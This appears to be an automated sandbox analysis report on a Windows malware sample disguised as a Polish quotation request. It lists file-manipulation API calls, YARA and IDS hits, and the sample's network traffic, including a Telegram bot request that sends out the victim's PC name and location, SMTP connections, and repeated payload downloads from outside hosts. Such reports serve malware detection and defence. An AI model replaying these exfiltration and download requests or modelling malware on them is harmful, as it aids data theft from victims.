                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0045DD7C FindFirstFileW,FindClose,1_2_0045DD7C
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,1_2_0044BD29
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,1_2_00436D2D
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00442E1F
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_00475FE5
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_0044BF8D
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeCode function: 4x nop then push ebp0_2_00417143
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeCode function: 4x nop then push ebp0_2_00416130
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeCode function: 4x nop then push ebp0_2_004171D7
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeCode function: 4x nop then push ebp0_2_004179F2
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeCode function: 4x nop then push ebp0_2_00417190
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeCode function: 4x nop then push ebp0_2_0041725A
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeCode function: 4x nop then push ebp0_2_004172E5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0529F8E9h10_2_0529F640
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0529FD41h10_2_0529FA98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 058631E0h10_2_05862DBF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 058631E0h10_2_05862DC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0586D7F9h10_2_0586D550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0586CF49h10_2_0586CCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0586F209h10_2_0586EF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0586E959h10_2_0586E6B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0586E0A9h10_2_0586DE00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0586DC51h10_2_0586D9A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 058631E0h10_2_0586310E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05862C19h10_2_05862968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0586D3A1h10_2_0586D0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0586FAB9h10_2_0586F810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_05860040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0586F661h10_2_0586F3B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0586EDB1h10_2_0586EB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05860D0Dh10_2_05860B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05861697h10_2_05860B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0586E501h10_2_0586E258

                    Networking

                    barindex
                    Source: C:\Windows\System\explorer.exeNetwork Connect: 108.177.15.82 80Jump to behavior
                    Source: C:\Windows\System\explorer.exeNetwork Connect: 51.81.194.202 443Jump to behavior
                    Source: C:\Windows\System\explorer.exeNetwork Connect: 142.251.168.82 80Jump to behavior
                    Source: C:\Windows\System\explorer.exeNetwork Connect: 64.233.166.82 80Jump to behavior
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Yara matchFile source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: global trafficTCP traffic: 192.168.2.5:49778 -> 212.44.112.138:587
                    Source: global trafficTCP traffic: 192.168.2.5:60451 -> 162.159.36.2:53
                    Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20and%20Time:%2029/10/2024%20/%2023:58:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20849224%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: DHH-ASSI DHH-ASSI
                    Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49709 -> 132.226.247.73:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 132.226.247.73:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49708 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49713 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49715 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49721 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49725 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.5:49778 -> 212.44.112.138:587
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /what-happened-to-the-old-zxq-website/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
